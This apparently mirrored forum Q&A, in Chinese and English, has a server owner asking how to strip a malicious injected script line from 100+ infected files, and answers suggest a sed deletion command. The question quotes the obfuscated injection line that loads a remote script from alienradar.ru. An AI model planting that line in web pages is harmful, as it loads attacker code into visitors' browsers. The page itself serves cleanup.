如何从多个文件中删除恶意 Javascript 代码

发布于 2024-09-30 04:13:37 字数 426 浏览 6 评论 0原文

最近我的 Linux 服务器感染了恶意软件,结果,我有 100 多个文件被一行 Javascript 代码感染:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

我太累了,无法手动删除它,所以我深入谷歌(对 Linux 不太了解)那里有帮助)并发现我可以使用 sed 来达到此目的。

不幸的是,我无法转义该行,因此我可以使用

sed -i.bak '/line of text/d' *

语法,它充满了单引号、双引号和反斜杠。

我怎样才能转义字符串或者有其他更简单的方法来做到这一点?

Recently my linux server got infected with malware and as a result, I have 100+ files infected with a single line of Javascript code:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

I would be too tiring to remove it manually, so I dig into google (not knowing much about linux did not help there) and found out that I can use sed for this purpose.

Unfortunately, I couldn't escape the line so I could use

sed -i.bak '/line of text/d' *

syntax, it's full of single quotes, double quotes and backslashes.

How could I escape the string or is there any other - easier - way of doing this?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(2

氛圍 2024-10-07 04:13:37

您不能仅使用 sed 删除包含例如 alienradar.ru 或仅存在于攻击性行中的其他子字符串的任何行吗?像这样的东西:

sed -i.bak '/alienradar.ru/d' *

Could you not just use sed to delete any line containing, for example, alienradar.ru, or some other substring which only exists in the offensive lines ? Something like:

sed -i.bak '/alienradar.ru/d' *
东风软 2024-10-07 04:13:37

http://www.configureweb .com/post/how-to-change-html-code-in-multiple-files-at-once 从服务器下载所有文件并重新上传后按照此操作

http://www.configureweb.com/post/how-to-change-html-code-in-multiple-files-at-once follow this after donwloading all files from server and reupload it

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文